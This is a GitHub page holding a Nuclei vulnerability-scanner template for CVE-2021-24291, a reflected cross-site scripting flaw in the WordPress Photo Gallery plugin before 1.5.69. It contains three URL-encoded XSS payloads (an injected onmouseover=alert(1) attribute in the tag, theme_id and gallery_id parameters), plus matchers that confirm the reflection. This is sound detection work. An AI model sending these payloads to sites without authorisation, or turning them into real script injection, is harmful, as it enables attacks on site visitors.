forked from geeknik/the-nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2021-24291.yaml
29 lines (26 loc) · 1.1 KB
/
CVE-2021-24291.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
id: CVE-2021-24291
info:
name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
author: geeknik
description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
severity: medium
tags: cve,cve2021,10web,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- "\" onmouseover=alert(1)>"